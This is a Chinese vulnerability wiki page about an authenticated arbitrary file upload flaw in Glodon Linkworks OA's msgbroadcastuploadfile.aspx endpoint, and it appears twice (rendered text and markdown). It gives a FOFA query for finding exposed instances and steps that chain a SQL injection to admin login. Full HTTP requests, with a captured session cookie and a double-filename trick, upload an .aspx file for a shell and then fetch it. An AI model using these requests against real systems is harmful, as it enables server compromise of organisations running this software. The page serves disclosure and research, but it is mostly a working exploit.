fofamini-wiki

登录白背景

源码

广联达OA后台msgbroadcastuploadfile.aspx任意文件上传漏洞

一、漏洞简介

广联达Linkworks办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。msgbroadcastuploadfile.aspx接口处存在后台文件上传漏洞，攻击者通过SQL注入获取管理员信息后，可以登陆发送请求包获取服务器权限。

二、影响版本

广联达办公OA

三、资产测绘

app.name="广联达 OA"
登录页面

四、漏洞复现

通过SQL注入漏洞获取管理员信息登录后台
通过上一步获取的cookie替换通过poc上传文件获取shell

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 0_styleName=styleA; ASP.NET_SessionId=iujpmeeoodatd3valrfzlybx; GTP_IdServer_LangID=2052; .ASPXAUTH=C07DD2AB8669EC488CEC31D5290CD2329A8D4A672DC579B15BF250A1AB0C457E32E3B74C3C5339217DB1ABF71F302CE29B12E2988BE1EDA7BD39515525C0885A086FD123D50953E91BEBFDD88D731383DB986843A483119D9C66569100EE12DF7B7E0E242CC663A9B4663D176D9181EC8095DFC63F22386362387F521C179730; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
 
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file" filename="1.aspx";filename="1.jpg"
Content-Type: application/text
 
test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

访问上传文件，需要携带登录成功后的cookie才能成功访问

GET /GTP/IM/Services/Group/Upload/259653de-0020-4743-a130-e092ca4d9e6a-1.aspx HTTP/1.1
Host: xx.xx.xx.xx
Cookie: 0_styleName=styleA; ASP.NET_SessionId=iujpmeeoodatd3valrfzlybx; GTP_IdServer_LangID=2052; .ASPXAUTH=C07DD2AB8669EC488CEC31D5290CD2329A8D4A672DC579B15BF250A1AB0C457E32E3B74C3C5339217DB1ABF71F302CE29B12E2988BE1EDA7BD39515525C0885A086FD123D50953E91BEBFDD88D731383DB986843A483119D9C66569100EE12DF7B7E0E242CC663A9B4663D176D9181EC8095DFC63F22386362387F521C179730; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

原文: https://www.yuque.com/xiaokp7/ocvun2/giewsbwbow422giv

# 广联达OA后台msgbroadcastuploadfile.aspx任意文件上传漏洞

# 一、漏洞简介
广联达Linkworks办公OA（Office Automation）是一款综合办公自动化解决方案，旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具，帮助企业管理和处理日常办公任务、流程和文档。`msgbroadcastuploadfile.aspx`接口处存在后台文件上传漏洞，攻击者通过SQL注入获取管理员信息后，可以登陆发送请求包获取服务器权限。

# 二、影响版本

- 广联达办公OA

# 三、资产测绘

- app.name="广联达 OA"
- 登录页面

![image.png](./img/M8orDMPh1PPm18_8/1693579287118-af540618-cbfd-44d4-82b6-cf9792772477-765318.png)

# 四、漏洞复现

1. 通过SQL注入漏洞获取管理员信息登录后台
2. 通过上一步获取的`cookie`替换通过poc上传文件获取shell
```
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 0_styleName=styleA; ASP.NET_SessionId=iujpmeeoodatd3valrfzlybx; GTP_IdServer_LangID=2052; .ASPXAUTH=C07DD2AB8669EC488CEC31D5290CD2329A8D4A672DC579B15BF250A1AB0C457E32E3B74C3C5339217DB1ABF71F302CE29B12E2988BE1EDA7BD39515525C0885A086FD123D50953E91BEBFDD88D731383DB986843A483119D9C66569100EE12DF7B7E0E242CC663A9B4663D176D9181EC8095DFC63F22386362387F521C179730; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
 
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file" filename="1.aspx";filename="1.jpg"
Content-Type: application/text
 
test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
```
![image.png](./img/M8orDMPh1PPm18_8/1693751885224-6c6b9db4-715e-4cc2-870d-e36bfc861753-853113.png)

3. 访问上传文件，需要携带登录成功后的cookie才能成功访问
```
GET /GTP/IM/Services/Group/Upload/259653de-0020-4743-a130-e092ca4d9e6a-1.aspx HTTP/1.1
Host: xx.xx.xx.xx
Cookie: 0_styleName=styleA; ASP.NET_SessionId=iujpmeeoodatd3valrfzlybx; GTP_IdServer_LangID=2052; .ASPXAUTH=C07DD2AB8669EC488CEC31D5290CD2329A8D4A672DC579B15BF250A1AB0C457E32E3B74C3C5339217DB1ABF71F302CE29B12E2988BE1EDA7BD39515525C0885A086FD123D50953E91BEBFDD88D731383DB986843A483119D9C66569100EE12DF7B7E0E242CC663A9B4663D176D9181EC8095DFC63F22386362387F521C179730; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![image.png](./img/M8orDMPh1PPm18_8/1693751953008-854592cc-b99d-4f21-9e56-a1d8e7dcfe4e-044857.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/giewsbwbow422giv>